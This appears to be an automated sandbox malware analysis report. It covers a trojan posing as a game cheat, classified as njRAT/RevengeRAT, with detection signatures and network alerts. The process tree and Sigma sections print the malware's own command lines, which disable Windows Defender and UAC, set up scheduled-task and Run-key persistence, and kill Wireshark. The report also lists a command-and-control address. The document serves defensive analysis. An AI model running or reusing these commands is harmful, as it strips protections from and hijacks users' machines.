Edit tour

Windows Analysis Report
SpeedHack666Cheat (no VM detected).exe

Overview

General Information

Sample name:	SpeedHack666Cheat (no VM detected).exe
Analysis ID:	1533472
MD5:	65c0f9249f64c65cda3e5ea32126fc1f
SHA1:	d567a001160109f58a4ec43db2abd9971e01afa7
SHA256:	7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a
Tags:	exeuser-MDMCk10
Infos:

Detection

Njrat, RevengeRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected Njrat

Yara detected RevengeRAT

.NET source code contains potential unpacker

AI detected suspicious sample

Creates autostart registry keys with suspicious names

Disables UAC (registry)

Disables Windows Defender (via service or powershell)

Disables zone checking for all users

Drops PE files to the startup folder

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Windows Defender protection settings

Protects its processes via BreakOnTermination flag

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dllhost Internet Connection

Sigma detected: Startup Folder File Write

Sigma detected: Unusual Parent Process For Cmd.EXE

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Yara signature match

Classification

Process Tree

System is w10x64

SpeedHack666Cheat (no VM detected).exe (PID: 6780 cmdline: "C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe" MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

dllhost.exe (PID: 5336 cmdline: "C:\ProgramData\dllhost.exe" MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

attrib.exe (PID: 432 cmdline: attrib +h "C:\ProgramData\dllhost.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2168 cmdline: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3284 cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WmiPrvSE.exe (PID: 4136 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 3712 cmdline: cmd /c sc query windefend MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3552 cmdline: sc query windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 3832 cmdline: cmd /c sc stop windefend MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4260 cmdline: sc stop windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 4676 cmdline: cmd /c sc delete windefend MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3848 cmdline: sc delete windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

schtasks.exe (PID: 6408 cmdline: schtasks /delete /tn CleanSweepCheck /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5308 cmdline: schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4468 cmdline: cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6368 cmdline: reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 6348 cmdline: cmd /c taskkill /f /im Wireshark.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4940 cmdline: taskkill /f /im Wireshark.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

dllhost.exe (PID: 7116 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

dllhost.exe (PID: 6052 cmdline: C:\ProgramData\dllhost.exe MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

svchost.exe (PID: 6812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dllhost.exe (PID: 4940 cmdline: "C:\ProgramData\dllhost.exe" .. MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

dllhost.exe (PID: 3276 cmdline: "C:\ProgramData\dllhost.exe" .. MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

dllhost.exe (PID: 6544 cmdline: "C:\ProgramData\dllhost.exe" .. MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

dllhost.exe (PID: 5480 cmdline: C:\ProgramData\dllhost.exe MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

dllhost.exe (PID: 4040 cmdline: C:\ProgramData\dllhost.exe MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

dllhost.exe (PID: 1268 cmdline: C:\ProgramData\dllhost.exe MD5: 65C0F9249F64C65CDA3E5EA32126FC1F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SpeedHack666Cheat (no VM detected).exe	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x260d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\dllhost.exe	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x260d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x260d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
C:\ClickMe.exe	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x260d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8

Memory Dumps

Source	Rule	Description	Author	Strings
00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x10c82:$a2: SEE_MASK_NOZONECHECKS 0xf14a:$a3: Download ERROR 0x11330:$a4: cmd.exe /c ping 0 -n 2 & del "
00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x10c82:$a2: SEE_MASK_NOZONECHECKS 0x115ba:$b1: [TAP] 0x11330:$c3: cmd.exe /c ping
00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x10c82:$reg: SEE_MASK_NOZONECHECKS 0xf118:$msg: Execute ERROR 0xf1ba:$msg: Execute ERROR 0x11330:$ping: cmd.exe /c ping 0 -n 2 & del
00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x10cde:$a2: SEE_MASK_NOZONECHECKS 0xf1a6:$a3: Download ERROR 0x1138c:$a4: cmd.exe /c ping 0 -n 2 & del "
00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x10cde:$a2: SEE_MASK_NOZONECHECKS 0x11616:$b1: [TAP] 0x1138c:$c3: cmd.exe /c ping
00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x10cde:$reg: SEE_MASK_NOZONECHECKS 0xf174:$msg: Execute ERROR 0xf216:$msg: Execute ERROR 0x1138c:$ping: cmd.exe /c ping 0 -n 2 & del
Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: dllhost.exe PID: 4940	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x244d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
0.2.SpeedHack666Cheat (no VM detected).exe.386da98.0.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x244d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.raw.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x260d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
0.0.SpeedHack666Cheat (no VM detected).exe.400000.0.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x260d2:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe, ProcessId: 6780, TargetFilename: C:\ProgramData\dllhost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\dllhost.exe" , ParentImage: C:\ProgramData\dllhost.exe, ParentProcessId: 5336, ParentProcessName: dllhost.exe, ProcessCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 2168, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\dllhost.exe" , CommandLine: "C:\ProgramData\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\dllhost.exe, NewProcessName: C:\ProgramData\dllhost.exe, OriginalFileName: C:\ProgramData\dllhost.exe, ParentCommandLine: "C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe", ParentImage: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe, ParentProcessId: 6780, ParentProcessName: SpeedHack666Cheat (no VM detected).exe, ProcessCommandLine: "C:\ProgramData\dllhost.exe" , ProcessId: 5336, ProcessName: dllhost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\dllhost.exe" .., EventID: 13, EventType: SetValue, Image: C:\ProgramData\dllhost.exe, ProcessId: 5336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\87078a174f1e0ed9d58afdf2d6d178c3

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 147.185.221.23, DestinationIsIpv6: false, DestinationPort: 6666, EventID: 3, Image: C:\ProgramData\dllhost.exe, Initiated: true, ProcessId: 5336, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\dllhost.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\dllhost.exe" , ParentImage: C:\ProgramData\dllhost.exe, ParentProcessId: 5336, ParentProcessName: dllhost.exe, ProcessCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 2168, ProcessName: cmd.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\dllhost.exe" .., EventID: 13, EventType: SetValue, Image: C:\ProgramData\dllhost.exe, ProcessId: 5336, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\87078a174f1e0ed9d58afdf2d6d178c3

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2168, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 3284, ProcessName: powershell.exe

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query windefend, CommandLine: sc query windefend, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd /c sc query windefend, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3712, ParentProcessName: cmd.exe, ProcessCommandLine: sc query windefend, ProcessId: 3552, ProcessName: sc.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6812, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe, CommandLine: schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\ProgramData\dllhost.exe" , ParentImage: C:\ProgramData\dllhost.exe, ParentProcessId: 5336, ParentProcessName: dllhost.exe, ProcessCommandLine: schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe, ProcessId: 5308, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Bladabindi/njRAT CnC Command (ll)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T18:28:43.286328+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49710	147.185.221.23	6666	TCP
2024-10-14T18:29:04.855133+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49714	147.185.221.23	6666	TCP
2024-10-14T18:29:28.348189+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49715	147.185.221.23	6666	TCP
2024-10-14T18:30:00.541312+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49716	147.185.221.23	6666	TCP
2024-10-14T18:30:14.767236+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49717	147.185.221.23	6666	TCP
2024-10-14T18:30:38.756634+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49718	147.185.221.23	6666	TCP
2024-10-14T18:31:01.786000+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49719	147.185.221.23	6666	TCP
2024-10-14T18:31:24.973100+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49720	147.185.221.23	6666	TCP
2024-10-14T18:31:48.417530+0200	2021176	1	Malware Command and Control Activity Detected	192.168.2.8	49721	147.185.221.23	6666	TCP

ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T18:28:43.286328+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49710	147.185.221.23	6666	TCP
2024-10-14T18:29:04.855133+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49714	147.185.221.23	6666	TCP
2024-10-14T18:29:28.348189+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49715	147.185.221.23	6666	TCP
2024-10-14T18:30:00.541312+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49716	147.185.221.23	6666	TCP
2024-10-14T18:30:14.767236+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49717	147.185.221.23	6666	TCP
2024-10-14T18:30:38.756634+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49718	147.185.221.23	6666	TCP
2024-10-14T18:31:01.786000+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49719	147.185.221.23	6666	TCP
2024-10-14T18:31:24.973100+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49720	147.185.221.23	6666	TCP
2024-10-14T18:31:48.417530+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.8	49721	147.185.221.23	6666	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SpeedHack666Cheat (no VM detected).exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\ProgramData\dllhost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\ClickMe.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Yara detected Njrat

Source: Yara match	File source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 4940, type: MEMORYSTR

Yara detected RevengeRAT

Source: Yara match

File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\dllhost.exe	Joe Sandbox ML: detected
Source: C:\ClickMe.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SpeedHack666Cheat (no VM detected).exe

Joe Sandbox ML: detected

Source: SpeedHack666Cheat (no VM detected).exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49710 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49710 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49717 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49717 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49714 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49714 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49720 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49720 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49719 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49719 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49716 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49716 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49715 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49715 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49718 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49718 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.8:49721 -> 147.185.221.23:6666
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.8:49721 -> 147.185.221.23:6666

Source: global traffic

TCP traffic: 192.168.2.8:49710 -> 147.185.221.23:6666

Source: Joe Sandbox View

IP Address: 147.185.221.23 147.185.221.23

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: order-resident.gl.at.ply.gg

Source: svchost.exe, 0000001C.00000002.3397450783.000001AAA9C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
